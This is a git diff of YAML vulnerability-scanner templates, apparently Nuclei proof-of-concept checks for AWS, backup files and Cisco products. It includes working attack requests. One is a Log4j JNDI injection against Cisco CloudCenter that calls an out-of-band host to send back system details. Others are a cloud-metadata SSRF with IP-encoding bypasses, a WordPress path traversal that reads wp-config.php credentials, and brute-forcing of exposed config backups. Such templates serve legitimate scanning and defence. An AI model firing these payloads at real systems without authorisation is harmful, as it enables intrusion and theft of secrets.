+ - aws.oast.online - 169.254.169.254 - + - 2852039166 # decimal encoding + - 169.254.169.254.nip.io unsafe: true matchers: - type: word @@ -43,3 +47,5 @@ requests: - "public-ipv4" - "privateIp" condition: or + +# digest: 4b0a00483046022100aaea6b60c84ab81c627ae7f0e712e68c83ca1f2deda1ad5b7d59be164e096642022100837009bd37d871f253921986b407d4b2b2a39619fcd568626a2a8b68e1fbcc25:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/metadata-aws.yaml b/poc/aws/metadata-aws.yaml deleted file mode 100644 index 1467afc69a..0000000000 --- a/poc/aws/metadata-aws.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: metadata-service-aws -# This attack abuses a misconfigured proxy that allows access to the metadata -# IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. -# -# The proxy may also be vulnerable to host/port enumeration on localhost or -# inside the private network. -info: - name: Amazon AWS Metadata Service Check - author: sullo - severity: critical - description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - reference: - - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - tags: exposure,proxy,aws,amazon,misconfig,metadata - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 9.3 - cwe-id: CWE-441 -requests: - - raw: - - |+ - GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 - Host: {{hostval}} - - payloads: - hostval: - - aws.interact.sh - - 169.254.169.254 - unsafe: true - matchers: - - type: word - part: body - words: - - "public-ipv4" - - "privateIp" - condition: or diff --git a/poc/aws/s3-bucket.yaml b/poc/aws/s3-bucket.yaml index c7927575ef..d542011f1c 100644 --- a/poc/aws/s3-bucket.yaml +++ b/poc/aws/s3-bucket.yaml @@ -1,4 +1,5 @@ id: s3-bucket + info: name: S3 Bucket Detect author: gaurang @@ -7,6 +8,7 @@ info: file: - extensions: - all + extractors: - type: regex regex: @@ -15,3 +17,5 @@ file: - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)" - "//s3\\.amazonaws\\.com/[a-z0-9._-]+" - "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" + +# digest: 4a0a00473045022100b23c497ae4dd1fda00fd382b868f55618111dba8e8d6182aacae04b31862b13102202165998551fea5da9c88dc506c8b8cdbf90a78885e7f51c83b52f6c77bb7a9ae:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/s3-detect-9964.yaml b/poc/aws/s3-detect-9964.yaml index 7868591be0..a7fdcd87d1 100644 --- a/poc/aws/s3-detect-9964.yaml +++ b/poc/aws/s3-detect-9964.yaml @@ -1,14 +1,29 @@ id: s3-detect + info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info -requests: + metadata: + max-request: 1 + tags: aws,s3,bucket,tech + +http: - method: GET path: - "{{BaseURL}}/%c0" + + matchers-condition: or matchers: - type: regex + part: body regex: - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" - part: body + + - type: dsl + dsl: + - 'contains(to_lower(server), "amazons3")' + - 'contains(to_lower(header), "x-amz-id")' + - 'contains(to_lower(header), "x-amz-request-id")' + +# digest: 4b0a00483046022100e4d62de5d67e017609c9e06ca9dcc8a840a222db5d65cb83201b7d13bb84dfa4022100efc723578b13403d1c4216dfc6add252cd5c7423d8e64045293962a21497a063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/s3-subtakeover-9968.yaml b/poc/aws/s3-subtakeover-9968.yaml deleted file mode 100644 index 19aa26d7bb..0000000000 --- a/poc/aws/s3-subtakeover-9968.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: s3-subtakeover -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: high - # Source:- https://link.medium.com/fgXKJHR9P7 -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/poc/aws/s3-subtakeover-9969.yaml b/poc/aws/s3-subtakeover-9969.yaml new file mode 100644 index 0000000000..6d3d3022a5 --- /dev/null +++ b/poc/aws/s3-subtakeover-9969.yaml @@ -0,0 +1,24 @@ +id: s3-subtakeover + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: high + + # Source:- https://link.medium.com/fgXKJHR9P7 + + +requests: + - method: GET + path: + - '{{BaseURL}}' + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/poc/backup/adb-backup-enabled-60.yaml b/poc/backup/adb-backup-enabled-60.yaml index 2f4a88df0a..7c0ecdd321 100644 --- a/poc/backup/adb-backup-enabled-60.yaml +++ b/poc/backup/adb-backup-enabled-60.yaml @@ -1,16 +1,23 @@ id: adb-backup-enabled - info: name: ADB Backup Enabled + description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + remediation: Ensure proper access or disable completely. author: gaurang severity: low tags: android,file - + reference: + -https://adb-backup.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 file: - extensions: - all - matchers: - type: word words: - - "android:allowBackup=\"true\"" \ No newline at end of file + - "android:allowBackup=\"true\"" + +# Enhanced by mp on 2022/02/09 diff --git a/poc/backup/db-backup-lfi-6774.yaml b/poc/backup/db-backup-lfi-6774.yaml deleted file mode 100644 index 5541cb013c..0000000000 --- a/poc/backup/db-backup-lfi-6774.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: db-backup-lfi -info: - name: DB Backup <= 4.5 - Path Traversal File Access - author: dhiyaneshDK - severity: high - description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. - reference: - - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - - https://www.exploit-db.com/exploits/35378 - tags: wordpress,wp-plugin,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/poc/backup/db-backup-lfi-6775.yaml b/poc/backup/db-backup-lfi-6775.yaml new file mode 100644 index 0000000000..48dcb57edf --- /dev/null +++ b/poc/backup/db-backup-lfi-6775.yaml @@ -0,0 +1,30 @@ +id: db-backup-lfi + +info: + name: DB Backup <= 4.5 - Path Traversal File Access + author: dhiyaneshDK + severity: high + description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive + information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + reference: + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 + - https://www.exploit-db.com/exploits/35378 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/poc/backup/db-backup-lfi-6776.yaml b/poc/backup/db-backup-lfi-6776.yaml index 48dcb57edf..ad45d744d3 100644 --- a/poc/backup/db-backup-lfi-6776.yaml +++ b/poc/backup/db-backup-lfi-6776.yaml @@ -1,14 +1,17 @@ id: db-backup-lfi info: - name: DB Backup <= 4.5 - Path Traversal File Access + name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK severity: high - description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive - information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp requests: @@ -28,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/backup/db-backup-lfi.yaml b/poc/backup/db-backup-lfi.yaml index c4c6c258b9..5541cb013c 100644 --- a/poc/backup/db-backup-lfi.yaml +++ b/poc/backup/db-backup-lfi.yaml @@ -1,5 +1,4 @@ id: db-backup-lfi - info: name: DB Backup <= 4.5 - Path Traversal File Access author: dhiyaneshDK @@ -9,12 +8,10 @@ info: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 tags: wordpress,wp-plugin,lfi,wp - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -23,7 +20,6 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 diff --git a/poc/backup/php-backup-files-9497.yaml b/poc/backup/php-backup-files-9498.yaml similarity index 100% rename from poc/backup/php-backup-files-9497.yaml rename to poc/backup/php-backup-files-9498.yaml diff --git a/poc/backup/php-backup-files.yaml b/poc/backup/php-backup-files.yaml index 9d285095bb..48988f2e39 100644 --- a/poc/backup/php-backup-files.yaml +++ b/poc/backup/php-backup-files.yaml @@ -1,128 +1,45 @@ id: php-backup-files - info: - name: PHP Source - Backup File Information Disclosure - author: StreetOfHackerR007,pwnhxl,mastercho,0xpugazh + name: PHP source disclosure through backup files + author: StreetOfHackerR007 (Rohit Soni) severity: medium - metadata: - max-request: 1222 - tags: exposure,backup,php,disclosure,fuzz - -http: + tags: exposure,backup,php +requests: - method: GET path: - - "{{BaseURL}}{{filepath}}{{bakext}}" - - attack: clusterbomb - payloads: - filepath: - - /wp-config.php # wordpress - - /wp-config # wordpress - - /site/default/settings.php # drupal - - /installation/configuration.php # joomla - - /app/etc/env.php # magento - - /Application/Common/Conf/config.php # thinkphp - - /environments/dev/common/config/main-local.php # yii - - /environments/prod/common/config/main-local.php # yii - - /common/config/main-local.php # yii - - /system/config/default.php # opencart - - /typo3conf/localconf.php # typo3 - - /config/config_global.php # discuz - - /config/config_ucenter.php # discuz - - /textpattern/config.php # textpattern - - /data/common.inc.php # dedecms - - /caches/configs/database.php # phpcms - - /caches/configs/system.php # phpcms - - /include/config.inc.php # phpcms - - /include/config.php # xbtit - - /includes/config.php # vbulletin - - /includes/config # vbulletin - - /phpsso_server/caches/configs/database.php # phpcms - - /phpsso_server/caches/configs/system.php # phpcms - - /zb_users/c_option.php # zblog - - /e/class/config.php # empirecms - - /e/config/config.php # empirecms - - /data/sql_config.php # phpwind - - /data/bbscache/config.php # phpwind - - /db.php - - /conn.php - - /database.php - - /db_config.php - - /config.inc.php - - /data/config.php - - /config/config.php - - /index.php - - /default.php - - /main.php - - /settings.php - - /header.php - - /footer.php - - /login.php - - /404.php - - /wp-login.php - - /config.php - - /config - - /const.DB.php.bak - bakext: - - ".~" - - ".bk" - - ".bak" - - ".bkp" - - ".BAK" - - ".swp" - - ".swo" - - ".swn" - - ".tmp" - - ".save" - - ".old" - - ".new" - - ".orig" - - ".dist" - - ".txt" - - ".disabled" - - ".original" - - ".backup" - - "_bak" - - "_1.bak" - - "~" - - "!" - - ".0" - - ".1" - - ".2" - - ".3" - + - "{{BaseURL}}/index.php.bak" + - "{{BaseURL}}/default.php.bak" + - "{{BaseURL}}/main.php.bak" + - "{{BaseURL}}/config.php.bak" + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/header.php.bak" + - "{{BaseURL}}/footer.php.bak" + - "{{BaseURL}}/login.php.bak" + - "{{BaseURL}}/database.php.bak" + - "{{BaseURL}}/db.php.bak" + - "{{BaseURL}}/conn.php.bak" + - "{{BaseURL}}/db_config.php.bak" + - "{{BaseURL}}/404.php.bak" + - "{{BaseURL}}/wp-config.php.bak" + - "{{BaseURL}}/wp-login.php.bak" matchers-condition: and matchers: - type: status status: - 200 - - type: word - part: body words: - "<?php" - "<?=" condition: or - - - type: word part: body + - type: word words: - "?>" - - "($" - - "$_GET[" - - "$_POST[" - - "$_REQUEST[" - - "$_SERVER[" - - "'DB_PASSWORD'" - - "'DBPASS'" - - "define('DB" - condition: or - + part: body - type: word - part: header words: - "text/plain" - "bytes" + part: header condition: or - -# digest: 4a0a00473045022100c2f95f7ee299ff0299868d14fc020a840753a4c4f6de51d4b0885f1c98422f940220085e23eb052005bcb2af3da437bc0e2be2c6a32ef3612877cbb5483e04bb1f0a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/server-backup-login-10153.yaml b/poc/backup/server-backup-login-10153.yaml new file mode 100644 index 0000000000..0639ab5356 --- /dev/null +++ b/poc/backup/server-backup-login-10153.yaml @@ -0,0 +1,19 @@ +id: server-backup-login +info: + name: Server Backup Manager SE Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6949 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - '<title>Idera Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/poc/backup/server-backup-login-10156.yaml b/poc/backup/server-backup-login-10156.yaml deleted file mode 100644 index 4089d46390..0000000000 --- a/poc/backup/server-backup-login-10156.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: server-backup-login -info: - name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga - severity: info - reference: - - https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Idera Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/backup/server-backup-login.yaml b/poc/backup/server-backup-login.yaml index 0639ab5356..91b0a05ace 100644 --- a/poc/backup/server-backup-login.yaml +++ b/poc/backup/server-backup-login.yaml @@ -1,19 +1,33 @@ id: server-backup-login + info: - name: Server Backup Manager SE Login - author: dhiyaneshDK + name: Server Backup Manager SE Login Panel - Detect + author: dhiyaneshDKi,pathtaga severity: info - reference: https://www.exploit-db.com/ghdb/6949 - tags: panel -requests: + description: Server Backup Manager SE login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: paneil,idera,edb + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - type: word words: - 'Idera Server Backup Manager SE ' + - type: status status: - 200 + +# digest: 4b0a0048304602210090abc9072a7291db264bd80b54c29efa2d20c83fa01a7010c87a84f97737417c02210089f946777a501eb1cb19bd09e3986cd67136b5806b261332c839db98947067cd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/server-backup-manager-se-10157.yaml b/poc/backup/server-backup-manager-se-10157.yaml deleted file mode 100644 index 555ccb9f67..0000000000 --- a/poc/backup/server-backup-manager-se-10157.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: server-backup-manager-se -info: - name: Server Backup Manager SE - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Server+Backup+Manager+SE%22 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/backup/server-backup-manager-se-10160.yaml b/poc/backup/server-backup-manager-se-10160.yaml new file mode 100644 index 0000000000..94e05a332f --- /dev/null +++ b/poc/backup/server-backup-manager-se-10160.yaml @@ -0,0 +1,20 @@ +id: server-backup-manager-se +info: + name: Server Backup Manager SE + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Server Backup Manager SE" + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - 'Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/poc/backup/server-backup-manager-se-login-detect.yaml b/poc/backup/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/backup/server-backup-manager-se-login-detect.yaml +++ b/poc/backup/server-backup-manager-se-login-detect.yaml @@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/backup/wordpress-total-upkeep-backup-download-11322.yaml b/poc/backup/wordpress-total-upkeep-backup-download-11324.yaml similarity index 100% rename from poc/backup/wordpress-total-upkeep-backup-download-11322.yaml rename to poc/backup/wordpress-total-upkeep-backup-download-11324.yaml diff --git a/poc/backup/wordpress-total-upkeep-backup-download.yaml b/poc/backup/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..a87b8fda8d 100644 --- a/poc/backup/wordpress-total-upkeep-backup-download.yaml +++ b/poc/backup/wordpress-total-upkeep-backup-download.yaml @@ -1,27 +1,36 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin -requests: + metadata: + max-request: 1 + tags: wordpress,wp-plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - 200 + +# digest: 4a0a004730450220740af42e52a68f0d6689e8a42beeed0b3a97aae6409f3ada8410b0de03a612e5022100a5a7de364e6d563966439fb830a1e355ce145bd70d1b17e1704dd01f1911e9b0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/backup/zip-backup-files-11818.yaml b/poc/backup/zip-backup-files-11818.yaml index ce98d14bd2..add5e5e76a 100644 --- a/poc/backup/zip-backup-files-11818.yaml +++ b/poc/backup/zip-backup-files-11818.yaml @@ -1,36 +1,79 @@ id: zip-backup-files + info: - name: Compressed Web File - author: Toufik Airane,dwisiswant0 + name: Compressed Backup File - Detect + author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl severity: medium + description: Multiple compressed backup files were detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 625 tags: exposure,backup -requests: + +http: - method: GET path: - - "{{BaseURL}}/{{Hostname}}.7z" - - "{{BaseURL}}/{{Hostname}}.bz2" - - "{{BaseURL}}/{{Hostname}}.gz" - - "{{BaseURL}}/{{Hostname}}.lz" - - "{{BaseURL}}/{{Hostname}}.rar" - - "{{BaseURL}}/{{Hostname}}.tar.gz" - - "{{BaseURL}}/{{Hostname}}.xz" - - "{{BaseURL}}/{{Hostname}}.zip" - - "{{BaseURL}}/{{Hostname}}.z" - - "{{BaseURL}}/{{Hostname}}.tar.z" - - "{{BaseURL}}/{{Hostname}}.db" - - "{{BaseURL}}/{{Hostname}}.sqlite" - - "{{BaseURL}}/{{Hostname}}.sqlitedb" - - "{{BaseURL}}/{{Hostname}}.sql.7z" - - "{{BaseURL}}/{{Hostname}}.sql.bz2" - - "{{BaseURL}}/{{Hostname}}.sql.gz" - - "{{BaseURL}}/{{Hostname}}.sql.lz" - - "{{BaseURL}}/{{Hostname}}.sql.rar" - - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" - - "{{BaseURL}}/{{Hostname}}.sql.xz" - - "{{BaseURL}}/{{Hostname}}.sql.zip" - - "{{BaseURL}}/{{Hostname}}.sql.z" - - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + - "{{BaseURL}}/{{FILENAME}}.{{EXT}}" + + attack: clusterbomb + payloads: + FILENAME: + - "{{FQDN}}" # www.example.com + - "{{RDN}}" # example.com + - "{{DN}}" # example + - "{{SD}}" # www + - "{{date_time('%Y')}}" # 2023 + - "ROOT" # tomcat + - "wwwroot" + - "htdocs" + - "www" + - "html" + - "web" + - "webapps" + - "public" + - "public_html" + - "uploads" + - "website" + - "api" + - "test" + - "app" + - "backup" + - "bin" + - "bak" + - "old" + - "Release" + - "inetpub" + EXT: + - "7z" + - "bz2" + - "gz" + - "lz" + - "rar" + - "tar.gz" + - "tar.bz2" + - "xz" + - "zip" + - "z" + - "tar.z" + - "db" + - "sqlite" + - "sqlitedb" + - "sql.7z" + - "sql.bz2" + - "sql.gz" + - "sql.lz" + - "sql.rar" + - "sql.tar.gz" + - "sql.xz" + - "sql.zip" + - "sql.z" + - "sql.tar.z" + - "war" max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and matchers: - type: binary @@ -48,10 +91,14 @@ requests: - "504B0304" # zip condition: or part: body + - type: regex regex: - "application/[-\\w.]+" part: header + - type: status status: - 200 + +# digest: 4b0a00483046022100c5d5034a82beeefe3aab1ed46ff6bc1cb753680a0f9940cc0aff7425f47dc0ae022100bb8aeb1b8c1a84c13b54e77a83c347f84b0b0b90727ccfcede6225d433712814:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-ace-device-manager.yaml b/poc/cisco/cisco-ace-device-manager.yaml index 5b017e6953..09704c579f 100644 --- a/poc/cisco/cisco-ace-device-manager.yaml +++ b/poc/cisco/cisco-ace-device-manager.yaml @@ -1,20 +1,14 @@ id: cisco-ace-device-manager info: - name: Cisco ACE 4710 Device Manager Login Panel - Detect + name: ACE 4710 Device Manager author: dhiyaneshDk severity: info - description: Cisco ACE 4710 Device Manager login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: html:"ACE 4710 Device Manager" tags: panel,cisco + metadata: + shodan-query: 'html:"ACE 4710 Device Manager"' -http: +requests: - method: GET path: - "{{BaseURL}}/index.vm" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 490a004630440220529c3b11ba4798d2d3c19dd186afc70f0dca757664d30532c5229bb8070f18ed02201f2d16437e3ced9db63fa4bd59afcc3707086ca18c86790f7356e92daf6d5dbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml deleted file mode 100644 index af3f889993..0000000000 --- a/poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: cisco-cloudcenter-suite-log4j-rce - -info: - name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution - author: pwnhxl - severity: critical - description: | - Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - reference: - - https://logging.apache.org/log4j/2.x/security.html - - http://www.openwall.com/lists/oss-security/2021/12/10/1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-77 - metadata: - fofa-query: title="CloudCenter Suite" - shodan-query: title:"CloudCenter Suite" - tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev - -requests: - - raw: - - | - @timeout: 10s - POST /suite-auth/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} - Content-Type: application/json - - {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - - - type: word - part: header - words: - - 'X-RateLimit-Limit-suite-gateway_suite-auth' - - extractors: - - type: kval - kval: - - interactsh_ip # Print remote interaction IP in output - - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - -# Enhanced by md on 2023/03/22 diff --git a/poc/cisco/cisco-cloudcenter-suite-rce.yaml b/poc/cisco/cisco-cloudcenter-suite-rce.yaml new file mode 100644 index 0000000000..37a4dabf81 --- /dev/null +++ b/poc/cisco/cisco-cloudcenter-suite-rce.yaml @@ -0,0 +1,73 @@ +id: cisco-cloudcenter-suite-log4j-rce + +info: + name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution + author: pwnhxl + severity: critical + description: | + Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"CloudCenter Suite" + fofa-query: title="CloudCenter Suite" + tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + +http: + - raw: + - | + @timeout: 10s + POST /suite-auth/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} + Content-Type: application/json + + {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'X-RateLimit-Limit-suite-gateway_suite-auth' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-edge-340.yaml 